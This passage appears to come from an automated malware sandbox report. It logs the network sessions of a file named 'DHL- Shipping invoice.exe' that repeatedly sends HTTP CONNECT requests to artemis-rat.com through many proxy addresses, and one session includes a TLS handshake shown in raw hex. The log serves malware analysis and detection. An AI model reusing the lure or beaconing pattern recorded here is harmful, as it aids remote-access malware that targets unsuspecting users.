                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1934192.168.2.451459132.148.16.169556106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.790843010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.865863085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.953488111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.063041925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.062278986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.062268019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:44.062390089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1935192.168.2.45520292.205.60.110232936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.800575972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.865863085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1936192.168.2.45379091.134.140.160308956484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.800854921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453244925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062848091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265894890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.562712908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.859617949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.250031948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.749937057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.749790907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1937192.168.2.453817162.214.227.68537876484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.800856113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1938192.168.2.455574104.244.75.78315346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.864196062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1939192.168.2.453868162.214.170.144166846484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.864240885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.865955114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.953488111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1940192.168.2.453915195.138.73.54311456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.869427919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1941192.168.2.455575217.27.149.19041536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.874382973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1942192.168.2.45543172.206.181.105649356484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.875624895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1943192.168.2.45161151.89.173.40447196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.933675051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1944192.168.2.454890162.253.68.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.934039116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1945192.168.2.453795148.72.209.174649386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.951325893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.065892935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.062972069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.063158989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.062269926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.062290907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:44.062544107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1946192.168.2.45527982.223.121.72603256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.951401949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140394926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250356913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.250524998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.343525887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.343527079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.359213114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.374509096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.531035900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1947192.168.2.45537794.79.152.14806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.970007896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.558525085 CET100INHTTP/1.0 200 Connection Established
                            Proxy-agent: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
                            Mar 12, 2024 08:37:12.653345108 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 27 ed 4a 92 32 49 3a 1f 0c 06 1b 71 e3 51 5a 1c a7 1a e5 7a a6 da 88 c4 44 da 22 14 5b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhe'J2I:qQZzD"[*,+0/$#('=<5/artemis-rat.com#W~Z&07*pce@R4(+9H7Cx|s;m
                            Mar 12, 2024 08:37:12.889313936 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 f0 06 28 c3 1c aa 69 36 53 0a 80 24 74 6c c9 b6 ac a7 98 77 60 21 25 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                            Data Ascii: C?e(i6S$tlw`!%DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                            Mar 12, 2024 08:37:12.889328957 CET174INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                            Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<A
                            Mar 12, 2024 08:37:12.889345884 CET1286INData Raw: c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f
                            Data Ascii: rp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50"0*H
                            Mar 12, 2024 08:37:12.889607906 CET1286INData Raw: d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb 88 9b 5a 25 be 77 09 e1 a7 6a 4e 11 75 b9 1e 4d f1 00 1b 6a 66 79 8e c3 6e d8 6d a2 22 a2 6d 05 fb 2c f2 f1 50 e5 a0 d1 d8 9f 35 7d fc 70 ab 59 2a 02 f1 be b0 d3 f1 f8 cd 12 b9 6a 25 90 5b e3 85 20
                            Data Ascii: [peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!X0*H0W10UBE10UGlobalSign nv-sa10
                            Mar 12, 2024 08:37:12.889621019 CET562INData Raw: 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b 7a c8 c0 18 37 fa 25 51 ac ec 68 bf b2 c8 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a
                            Data Ascii: v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR
                            Mar 12, 2024 08:37:12.900666952 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 8c fd ca e1 8d cf 73 a9 0e b5 5a 1a fd e8 59 7f 44 bc e2 e7 cc c5 fd 20 00 20 9a 0a 6b a1 5c 02 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 1c 67 f8 eb 12 02 02 cd c1 f1 33 1a a4 4f 97 08 f5 9a 9d 7c 15
                            Data Ascii: %! sZYD k\(g3O|?m
                            Mar 12, 2024 08:37:13.097814083 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 ff 06 72 71 16 fc 65 a5 7f c0 26 46 48 0b b4 e1 da 1f d8 dc b9 ac f4 7d da fc 6f 6b 5c ea 87 74 1c fc 6c 79 7b cd 88 b6 e0 84 20 f7 8e bf 61 01 e7 12 06 14 35 2b 08 13 95 29 01 b8 fa c5 e0 70 e1 97 70
                            Data Ascii: rqe&FH}ok\tly{ a5+)ppx{B4{#$9SIlY-07`KkE!dn8|0deVbZ3p:HQZ(n`{V(C
                            Mar 12, 2024 08:37:27.613261938 CET31INData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 01 a6 2b b1 fc af fc 2a ff ed 37 44 cf 1c 44 93 9e e0 3c
                            Data Ascii: +*7DD<


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1948192.168.2.45557160.188.102.225180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.976037979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1949192.168.2.45162566.228.33.19078416484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.976939917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1950192.168.2.451615146.19.106.145123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.983422995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1951192.168.2.450976123.241.210.123806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.987485886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1952192.168.2.455586192.154.195.7690006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.988012075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453242064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1953192.168.2.455577154.12.178.107299856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.988814116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1954192.168.2.45551098.181.137.8341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.989264011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1955192.168.2.45400851.158.124.167163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.989558935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140558004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250356913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.250535011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.343606949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.343547106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.359208107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
